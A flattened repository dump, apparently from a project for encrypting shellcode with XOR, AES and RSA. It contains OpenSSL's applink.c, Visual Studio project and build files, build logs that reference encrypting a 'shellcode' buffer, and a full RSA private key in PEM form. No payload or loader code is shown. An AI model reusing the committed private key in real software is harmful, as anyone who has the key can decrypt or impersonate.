/* Return this module's stderr stream as an untyped pointer. */
static void *app_stderr(void)
{
    void *stream = stderr;

    return stream;
}
61 |
/*
 * Function-form wrapper around feof(), so that its address can be stored in
 * the applink table. Returns feof(fp) unchanged.
 */
static int app_feof(FILE *fp)
{
    int at_end = feof(fp);

    return at_end;
}
66 |
/*
 * Function-form wrapper around ferror(), so that its address can be stored in
 * the applink table. Returns ferror(fp) unchanged.
 */
static int app_ferror(FILE *fp)
{
    int failed = ferror(fp);

    return failed;
}
71 |
/*
 * Function-form wrapper around clearerr(), so that its address can be stored
 * in the applink table. Resets the end-of-file and error indicators of fp.
 */
static void app_clearerr(FILE *fp)
{
    clearerr(fp);
    return;
}
76 |
/*
 * Return the low-level descriptor behind fp, as reported by _fileno().
 * The result is passed through without any check.
 */
static int app_fileno(FILE *fp)
{
    int fd = _fileno(fp);

    return fd;
}
81 |
/*
 * Switch the descriptor behind fp to binary translation mode when mod is 'b'
 * and to text mode for every other value of mod. Returns whatever _setmode()
 * returns; the descriptor from _fileno() is not validated here.
 */
static int app_fsetmod(FILE *fp, char mod)
{
    int mode;

    if (mod == 'b')
        mode = _O_BINARY;
    else
        mode = _O_TEXT;

    return _setmode(_fileno(fp), mode);
}
86 |
87 | #ifdef __cplusplus
88 | extern "C" {
89 | #endif
90 |
/*
 * Exported entry point that hands out this module's I/O function table.
 *
 * The table is a static array of APPLINK_MAX + 1 untyped pointers. Slot 0
 * holds APPLINK_MAX itself; slots 1..APPLINK_MAX hold the stdio wrappers
 * defined above plus the C runtime's FILE-level and descriptor-level
 * functions, each at the index given by its APPLINK_* macro.
 *
 * The table is filled on the first call only. The first-call flag is a plain
 * static int and nothing here synchronises concurrent first calls; every
 * store writes the same value each time, so a repeated fill produces the
 * same table.
 */
__declspec(dllexport)
void **
# if defined(__BORLANDC__)
/*
 * __stdcall appears to be the only way to get the name
 * decoration right with Borland C. Otherwise it works
 * purely incidentally, as we pass no parameters.
 */
__stdcall
# else
__cdecl
# endif
OPENSSL_Applink(void)
{
    static int pending = 1;
    static void *OPENSSL_ApplinkTable[APPLINK_MAX + 1] =
        { (void *)APPLINK_MAX };

    /* Already populated: hand back the same table. */
    if (!pending)
        return OPENSSL_ApplinkTable;

    /* Standard streams, exposed through accessor functions. */
    OPENSSL_ApplinkTable[APPLINK_STDIN] = app_stdin;
    OPENSSL_ApplinkTable[APPLINK_STDOUT] = app_stdout;
    OPENSSL_ApplinkTable[APPLINK_STDERR] = app_stderr;

    /* FILE-based I/O. */
    OPENSSL_ApplinkTable[APPLINK_FPRINTF] = fprintf;
    OPENSSL_ApplinkTable[APPLINK_FGETS] = fgets;
    OPENSSL_ApplinkTable[APPLINK_FREAD] = fread;
    OPENSSL_ApplinkTable[APPLINK_FWRITE] = fwrite;
    OPENSSL_ApplinkTable[APPLINK_FSETMOD] = app_fsetmod;
    OPENSSL_ApplinkTable[APPLINK_FEOF] = app_feof;
    OPENSSL_ApplinkTable[APPLINK_FCLOSE] = fclose;

    OPENSSL_ApplinkTable[APPLINK_FOPEN] = fopen;
    OPENSSL_ApplinkTable[APPLINK_FSEEK] = fseek;
    OPENSSL_ApplinkTable[APPLINK_FTELL] = ftell;
    OPENSSL_ApplinkTable[APPLINK_FFLUSH] = fflush;
    OPENSSL_ApplinkTable[APPLINK_FERROR] = app_ferror;
    OPENSSL_ApplinkTable[APPLINK_CLEARERR] = app_clearerr;
    OPENSSL_ApplinkTable[APPLINK_FILENO] = app_fileno;

    /* Descriptor-based I/O. */
    OPENSSL_ApplinkTable[APPLINK_OPEN] = _open;
    OPENSSL_ApplinkTable[APPLINK_READ] = _read;
    OPENSSL_ApplinkTable[APPLINK_WRITE] = _write;
    OPENSSL_ApplinkTable[APPLINK_LSEEK] = _lseek;
    OPENSSL_ApplinkTable[APPLINK_CLOSE] = _close;

    pending = 0;

    return OPENSSL_ApplinkTable;
}
140 |
141 | #ifdef __cplusplus
142 | }
143 | #endif
144 | #endif
145 |
--------------------------------------------------------------------------------
/rsa加密/libcrypto-3-x64.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/rsa加密/libcrypto-3-x64.dll
--------------------------------------------------------------------------------
/rsa加密/main.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/rsa加密/main.cpp
--------------------------------------------------------------------------------
/rsa加密/private.pem:
--------------------------------------------------------------------------------
1 | -----BEGIN RSA PRIVATE KEY-----
2 | MIIEpAIBAAKCAQEA4P0HkHnwILoW2osYJouoW2CT/wHMrdA9AyBlgGD3KJQ7MBAk
3 | thweBzbp3KNDCOA8YPVlXABcJ14GiSmR2DJ4iJiK/MR0rvi9Z1L/6B8TpeiKCbyw
4 | dHheMhh6sZfyRd598aTA+MTvwuZTcuBsplv7ZTI/K7ydLFLxAhz+UfrL/A2T/dj+
5 | FVQaAK51RXg1182Cnc/+9fDcVDlkv6ZUZF83ojuSW4cxDVqGsm8E2Lr87T+KyVnv
6 | l1EREUyod3QSw9SPwt1X5nF5NeY8Uuo1xTpFrt99TY7uTQgOrhUO374JXfO+zlIg
7 | Qy1Em8BqZGp3QgUC7CDGwrBHQEhQZf+dFNNscwIDAQABAoIBACC+cpViScJZku3n
8 | hHJHrQ7vdVqNpn49akPEOUF/2zi6qgqKru0aFnyyT0LfN+hYyjDKRiAnpUHNe2IG
9 | /MTcQ5KNsNysstasONSKzde4fiGNQFm+bmflBMCBs4mZNZdZlDbQ5YzPDJ3u64Iy
10 | i12C0Yme0HbLEoza3VyTX6gKuhlKkr34WoYGU773osEBbZUQqkFsGoxIsabQ2zN4
11 | iV7zquGROtACd0FONtbGY9bEo9VYIMh0uzNCdKopojoSX+l9YN8bd78kJZA4A51c
12 | NNMFyMBhOH328IvZCjcauO7Fwf56oatAPCVAQZfSuisfPK4xxlpunOVpmxOsUT3W
13 | p5A5AEECgYEA8EH2diHpUPdIxHAjMm7WEDsLas2gsgajjYFdjxp5HwtzbSdDIRR6
14 | 9sfVMTRtm7+195mzx3+VwFI/rbjIM9Tm5REcjWm/IJQJipit4r0FveIihIga7qK3
15 | WkMI7xr0lTW55mk4S1i/QGxCLgBlIQynHEXBDyvyX+wsT0tRtz1DjEMCgYEA77rx
16 | Yx2/ceEZojcUGTDdROqfU1r0KNAs15w7OH/tPW8b+7rcbQ836mT1Va1qPklKf1zO
17 | lj6NNNDrCxJJ572P0wx2lQ8jfBreQWRaOBr6FDjndoMDNAktz6FK7cCikZ8Ax4rk
18 | 614nMJOmw7jZ6jgzGnIQSet9NMEmVwqveHjotBECgYBV9rQRlpadoq0FpD3juKad
19 | DhNKtqJNsHRqmCP6pPU7d2RoZMjvGB3bGKsePO0O8ixQmE0sD2lsc8FXDiuL6Bxp
20 | T5MQwgphxLYZQgHNg+Z/B19kXjKMuemywRN8Qf/LN3r5hyJeSzW6/kE7pmaIybct
21 | NYQbQpUpXx6HjKKDVsdJcwKBgQDfXGjoFqF3c2o0z+i0B+lB+vDz8zymgkAlq/Up
22 | kVfz84A5LUOPgaxxghtr9qWU3yjAPjJlnmZmnXlB2YpulxpYY7Zg77f6O/Z1KxE8
23 | UTZMfTB8JVlotFywpfFwUBmoYGOTh//+pL0S759joOm45yAGNdyjYvxHmOcmFlij
24 | gNQgYQKBgQCHtynyLxjgmRb1wzcZsOR0DH0XjadopYL+exmlKq57BU8iKBzK4Dzl
25 | DGW3gS4xGiJ0/hr1rF05UQPo2/TRcQFmRfQtBXftGvUfpcRACfzRmceuxgoPjXqm
26 | dNJTLn/6g5tXuHbjUq9w4BgorIT4CNecOIUugybLeXqzqAnzKOW1Bw==
27 | -----END RSA PRIVATE KEY-----
28 |
--------------------------------------------------------------------------------
/rsa加密/public.pem:
--------------------------------------------------------------------------------
1 | -----BEGIN RSA PUBLIC KEY-----
2 | MIIBCgKCAQEA4P0HkHnwILoW2osYJouoW2CT/wHMrdA9AyBlgGD3KJQ7MBAkthwe
3 | Bzbp3KNDCOA8YPVlXABcJ14GiSmR2DJ4iJiK/MR0rvi9Z1L/6B8TpeiKCbywdHhe
4 | Mhh6sZfyRd598aTA+MTvwuZTcuBsplv7ZTI/K7ydLFLxAhz+UfrL/A2T/dj+FVQa
5 | AK51RXg1182Cnc/+9fDcVDlkv6ZUZF83ojuSW4cxDVqGsm8E2Lr87T+KyVnvl1ER
6 | EUyod3QSw9SPwt1X5nF5NeY8Uuo1xTpFrt99TY7uTQgOrhUO374JXfO+zlIgQy1E
7 | m8BqZGp3QgUC7CDGwrBHQEhQZf+dFNNscwIDAQAB
8 | -----END RSA PUBLIC KEY-----
9 |
--------------------------------------------------------------------------------
/rsa加密/rsa加密.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {1f7476fa-60c8-4f91-8fd5-c5e31d3a6888}
25 | rsa加密
26 | 10.0
27 |
28 |
29 |
30 | Application
31 | true
32 | v143
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v143
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v143
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v143
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 | Level3
76 | true
77 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
78 | true
79 |
80 |
81 | Console
82 | true
83 |
84 |
85 |
86 |
87 | Level3
88 | true
89 | true
90 | true
91 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
92 | true
93 |
94 |
95 | Console
96 | true
97 | true
98 | true
99 |
100 |
101 |
102 |
103 | Level3
104 | false
105 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
106 | true
107 |
108 |
109 | Console
110 | true
111 |
112 |
113 |
114 |
115 | Level3
116 | true
117 | true
118 | false
119 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
120 | true
121 |
122 |
123 | Console
124 | true
125 | true
126 | true
127 |
128 |
129 |
130 |
131 |
132 |
133 |
134 |
135 |
136 |
--------------------------------------------------------------------------------
/rsa加密/rsa加密.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | 源文件
20 |
21 |
22 | 源文件
23 |
24 |
25 |
--------------------------------------------------------------------------------
/rsa加密/rsa加密.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/rsa加密/x64/Debug/applink.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/rsa加密/x64/Debug/applink.obj
--------------------------------------------------------------------------------
/rsa加密/x64/Debug/main.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/rsa加密/x64/Debug/main.obj
--------------------------------------------------------------------------------
/rsa加密/x64/Debug/rsa加密.Build.CppClean.log:
--------------------------------------------------------------------------------
1 | e:\source code\c_code\shellcode加密\rsa加密\x64\debug\vc143.pdb
2 | e:\source code\c_code\shellcode加密\rsa加密\x64\debug\vc143.idb
3 | e:\source code\c_code\shellcode加密\rsa加密\x64\debug\main.obj
4 | e:\source code\c_code\shellcode加密\rsa加密\x64\debug\rsa加密.ilk
5 | e:\source code\c_code\shellcode加密\x64\debug\rsa加密.exe
6 | e:\source code\c_code\shellcode加密\x64\debug\rsa加密.pdb
7 | e:\source code\c_code\shellcode加密\rsa加密\x64\debug\rsa加密.tlog\cl.command.1.tlog
8 | e:\source code\c_code\shellcode加密\rsa加密\x64\debug\rsa加密.tlog\cl.read.1.tlog
9 | e:\source code\c_code\shellcode加密\rsa加密\x64\debug\rsa加密.tlog\cl.write.1.tlog
10 | e:\source code\c_code\shellcode加密\rsa加密\x64\debug\rsa加密.tlog\link.command.1.tlog
11 | e:\source code\c_code\shellcode加密\rsa加密\x64\debug\rsa加密.tlog\link.read.1.tlog
12 | e:\source code\c_code\shellcode加密\rsa加密\x64\debug\rsa加密.tlog\link.write.1.tlog
13 |
--------------------------------------------------------------------------------
/rsa加密/x64/Debug/rsa加密.exe.recipe:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | E:\Source Code\C_code\shellcode加密\x64\Debug\rsa加密.exe
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/rsa加密/x64/Debug/rsa加密.ilk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/rsa加密/x64/Debug/rsa加密.ilk
--------------------------------------------------------------------------------
/rsa加密/x64/Debug/rsa加密.log:
--------------------------------------------------------------------------------
1 | main.cpp
2 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(14,14): warning C4996: 'fopen': This function or variable may be unsafe. Consider using fopen_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
3 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(15,9): warning C4996: 'PEM_write_RSAPublicKey': Since OpenSSL 3.0
4 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(18,14): warning C4996: 'fopen': This function or variable may be unsafe. Consider using fopen_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
5 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(19,9): warning C4996: 'PEM_write_RSAPrivateKey': Since OpenSSL 3.0
6 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(80,130): warning C4267: “参数”: 从“size_t”转换到“int”,可能丢失数据
7 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(29,20): warning C4996: 'RSA_new': Since OpenSSL 3.0
8 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(33,5): warning C4996: 'RSA_generate_key_ex': Since OpenSSL 3.0
9 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(80,28): warning C4996: 'RSA_public_encrypt': Since OpenSSL 3.0
10 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(88,28): warning C4996: 'RSA_private_decrypt': Since OpenSSL 3.0
11 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(97,5): warning C4996: 'RSA_free': Since OpenSSL 3.0
12 | 正在创建库 E:\Source Code\C_code\shellcode加密\x64\Debug\rsa加密.lib 和对象 E:\Source Code\C_code\shellcode加密\x64\Debug\rsa加密.exp
13 | LINK : warning LNK4232: 名称 rsa加密.exe 包含非 ASCII 字符,在具有除 936 以外的 ANSI 代码页的系统上可能不能加载 DLL
14 | rsa加密.vcxproj -> E:\Source Code\C_code\shellcode加密\x64\Debug\rsa加密.exe
15 | E:\vcpkg\scripts\buildsystems\msbuild\vcpkg.targets(228,5): warning : [vcpkg] Failed to gather app local DLL dependencies, program may not run. Set VcpkgApplocalDeps to false in your project file to suppress this warning. PowerShell arguments: -ExecutionPolicy Bypass -noprofile -File "E:\vcpkg\scripts\buildsystems\msbuild\applocal.ps1" "E:\Source Code\C_code\shellcode加密\x64\Debug\rsa加密.exe" "E:\vcpkg\installed\x64-windows\debug\bin" "x64\Debug\rsa加密.tlog\rsa加密.write.1u.tlog" "x64\Debug\vcpkg.applocal.log"
16 |
--------------------------------------------------------------------------------
/rsa加密/x64/Debug/rsa加密.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/rsa加密/x64/Debug/rsa加密.tlog/CL.command.1.tlog
--------------------------------------------------------------------------------
/rsa加密/x64/Debug/rsa加密.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/rsa加密/x64/Debug/rsa加密.tlog/CL.read.1.tlog
--------------------------------------------------------------------------------
/rsa加密/x64/Debug/rsa加密.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/rsa加密/x64/Debug/rsa加密.tlog/CL.write.1.tlog
--------------------------------------------------------------------------------
/rsa加密/x64/Debug/rsa加密.tlog/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/rsa加密/x64/Debug/rsa加密.tlog/link.command.1.tlog
--------------------------------------------------------------------------------
/rsa加密/x64/Debug/rsa加密.tlog/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/rsa加密/x64/Debug/rsa加密.tlog/link.read.1.tlog
--------------------------------------------------------------------------------
/rsa加密/x64/Debug/rsa加密.tlog/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/rsa加密/x64/Debug/rsa加密.tlog/link.write.1.tlog
--------------------------------------------------------------------------------
/rsa加密/x64/Debug/rsa加密.tlog/link.write.2u.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/rsa加密/x64/Debug/rsa加密.tlog/link.write.2u.tlog
--------------------------------------------------------------------------------
/rsa加密/x64/Debug/rsa加密.tlog/rsa加密.lastbuildstate:
--------------------------------------------------------------------------------
1 | PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.35.32215:TargetPlatformVersion=10.0.22621.0:VcpkgTriplet=x64-windows:
2 | Debug|x64|E:\Source Code\C_code\shellcode加密\|
3 |
--------------------------------------------------------------------------------
/rsa加密/x64/Debug/rsa加密.vcxproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/rsa加密/x64/Debug/rsa加密.vcxproj.FileListAbsolute.txt
--------------------------------------------------------------------------------
/rsa加密/x64/Debug/vc143.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/rsa加密/x64/Debug/vc143.idb
--------------------------------------------------------------------------------
/rsa加密/x64/Debug/vc143.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/rsa加密/x64/Debug/vc143.pdb
--------------------------------------------------------------------------------
/rsa加密/x64/Release/applink.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/rsa加密/x64/Release/applink.obj
--------------------------------------------------------------------------------
/rsa加密/x64/Release/rsa加密.Build.CppClean.log:
--------------------------------------------------------------------------------
1 | e:\source code\c_code\shellcode加密\rsa加密\x64\release\vc143.pdb
2 | e:\source code\c_code\shellcode加密\rsa加密\x64\release\applink.obj
3 | e:\source code\c_code\shellcode加密\rsa加密\x64\release\main.obj
4 | e:\source code\c_code\shellcode加密\x64\release\rsa加密.lib
5 | e:\source code\c_code\shellcode加密\x64\release\rsa加密.exp
6 | e:\source code\c_code\shellcode加密\x64\release\rsa加密.exe
7 | e:\source code\c_code\shellcode加密\rsa加密\x64\release\rsa加密.ipdb
8 | e:\source code\c_code\shellcode加密\x64\release\rsa加密.pdb
9 | e:\source code\c_code\shellcode加密\rsa加密\x64\release\rsa加密.iobj
10 | e:\source code\c_code\shellcode加密\rsa加密\x64\release\rsa加密.tlog\cl.command.1.tlog
11 | e:\source code\c_code\shellcode加密\rsa加密\x64\release\rsa加密.tlog\cl.read.1.tlog
12 | e:\source code\c_code\shellcode加密\rsa加密\x64\release\rsa加密.tlog\cl.write.1.tlog
13 | e:\source code\c_code\shellcode加密\rsa加密\x64\release\rsa加密.tlog\link.command.1.tlog
14 | e:\source code\c_code\shellcode加密\rsa加密\x64\release\rsa加密.tlog\link.read.1.tlog
15 | e:\source code\c_code\shellcode加密\rsa加密\x64\release\rsa加密.tlog\link.write.1.tlog
16 | e:\source code\c_code\shellcode加密\rsa加密\x64\release\rsa加密.tlog\link.write.2u.tlog
17 |
--------------------------------------------------------------------------------
/rsa加密/x64/Release/rsa加密.exe.recipe:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | E:\Source Code\C_code\shellcode加密\x64\Release\rsa加密.exe
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/rsa加密/x64/Release/rsa加密.log:
--------------------------------------------------------------------------------
1 | applink.c
2 | E:\Source Code\C_code\shellcode加密\rsa加密\applink.c(121,47): warning C4996: 'fopen': This function or variable may be unsafe. Consider using fopen_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
3 | E:\Source Code\C_code\shellcode加密\rsa加密\applink.c(129,46): warning C4996: '_open': This function or variable may be unsafe. Consider using _sopen_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
4 | main.cpp
5 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(14,14): warning C4996: 'fopen': This function or variable may be unsafe. Consider using fopen_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
6 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(15,9): warning C4996: 'PEM_write_RSAPublicKey': Since OpenSSL 3.0
7 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(18,14): warning C4996: 'fopen': This function or variable may be unsafe. Consider using fopen_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
8 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(19,9): warning C4996: 'PEM_write_RSAPrivateKey': Since OpenSSL 3.0
9 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(53,16): warning C4996: 'fopen': This function or variable may be unsafe. Consider using fopen_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
10 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(59,23): warning C4996: 'PEM_read_RSAPrivateKey': Since OpenSSL 3.0
11 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(67,24): warning C4996: 'RSA_private_decrypt': Since OpenSSL 3.0
12 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(68,5): warning C4996: 'RSA_free': Since OpenSSL 3.0
13 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(105,47): error C2065: “shellcode”: 未声明的标识符
14 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(105,89): error C2065: “shellcode”: 未声明的标识符
15 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(105,119): error C2065: “keypair”: 未声明的标识符
16 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(105,28): error C2660: “RSA_public_encrypt”: 函数不接受 4 个参数
17 | E:\vcpkg\installed\x64-windows\include\openssl\rsa.h(288,5): message : 参见“RSA_public_encrypt”的声明
18 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(105,28): message : 尝试匹配参数列表“()”时
19 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(114,88): error C2065: “keypair”: 未声明的标识符
20 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(130,14): error C2065: “keypair”: 未声明的标识符
21 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(131,13): error C2065: “bn”: 未声明的标识符
22 |
--------------------------------------------------------------------------------
/rsa加密/x64/Release/rsa加密.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/rsa加密/x64/Release/rsa加密.tlog/CL.command.1.tlog
--------------------------------------------------------------------------------
/rsa加密/x64/Release/rsa加密.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/rsa加密/x64/Release/rsa加密.tlog/CL.read.1.tlog
--------------------------------------------------------------------------------
/rsa加密/x64/Release/rsa加密.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/rsa加密/x64/Release/rsa加密.tlog/CL.write.1.tlog
--------------------------------------------------------------------------------
/rsa加密/x64/Release/rsa加密.tlog/rsa加密.lastbuildstate:
--------------------------------------------------------------------------------
1 | PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.35.32215:TargetPlatformVersion=10.0.22621.0:VcpkgTriplet=x64-windows:
2 | Release|x64|E:\Source Code\C_code\shellcode加密\|
3 |
--------------------------------------------------------------------------------
/rsa加密/x64/Release/rsa加密.tlog/unsuccessfulbuild:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/rsa加密/x64/Release/rsa加密.tlog/unsuccessfulbuild
--------------------------------------------------------------------------------
/rsa加密/x64/Release/rsa加密.vcxproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/rsa加密/x64/Release/rsa加密.vcxproj.FileListAbsolute.txt
--------------------------------------------------------------------------------
/rsa加密/x64/Release/vc143.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/rsa加密/x64/Release/vc143.pdb
--------------------------------------------------------------------------------
/shellcode加密.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 17
4 | VisualStudioVersion = 17.5.33530.505
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "xor加密", "xor加密\xor加密.vcxproj", "{F6E80E9F-0333-4AF4-8BBD-E9B6C2A8A4B9}"
7 | EndProject
8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "aes加密", "aes加密\aes加密.vcxproj", "{734881F0-B88D-41E3-B9C2-A48A8E0772D4}"
9 | EndProject
10 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Shellcode加密库", "Shellcode加密库\Shellcode加密库.vcxproj", "{B4DC16FF-79C8-4C66-BE29-8528B628B876}"
11 | EndProject
12 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "rsa加密", "rsa加密\rsa加密.vcxproj", "{1F7476FA-60C8-4F91-8FD5-C5E31D3A6888}"
13 | EndProject
14 | Global
15 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
16 | Debug|x64 = Debug|x64
17 | Debug|x86 = Debug|x86
18 | Release|x64 = Release|x64
19 | Release|x86 = Release|x86
20 | EndGlobalSection
21 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
22 | {F6E80E9F-0333-4AF4-8BBD-E9B6C2A8A4B9}.Debug|x64.ActiveCfg = Debug|x64
23 | {F6E80E9F-0333-4AF4-8BBD-E9B6C2A8A4B9}.Debug|x64.Build.0 = Debug|x64
24 | {F6E80E9F-0333-4AF4-8BBD-E9B6C2A8A4B9}.Debug|x86.ActiveCfg = Debug|Win32
25 | {F6E80E9F-0333-4AF4-8BBD-E9B6C2A8A4B9}.Debug|x86.Build.0 = Debug|Win32
26 | {F6E80E9F-0333-4AF4-8BBD-E9B6C2A8A4B9}.Release|x64.ActiveCfg = Release|x64
27 | {F6E80E9F-0333-4AF4-8BBD-E9B6C2A8A4B9}.Release|x64.Build.0 = Release|x64
28 | {F6E80E9F-0333-4AF4-8BBD-E9B6C2A8A4B9}.Release|x86.ActiveCfg = Release|Win32
29 | {F6E80E9F-0333-4AF4-8BBD-E9B6C2A8A4B9}.Release|x86.Build.0 = Release|Win32
30 | {734881F0-B88D-41E3-B9C2-A48A8E0772D4}.Debug|x64.ActiveCfg = Debug|x64
31 | {734881F0-B88D-41E3-B9C2-A48A8E0772D4}.Debug|x64.Build.0 = Debug|x64
32 | {734881F0-B88D-41E3-B9C2-A48A8E0772D4}.Debug|x86.ActiveCfg = Debug|Win32
33 | {734881F0-B88D-41E3-B9C2-A48A8E0772D4}.Debug|x86.Build.0 = Debug|Win32
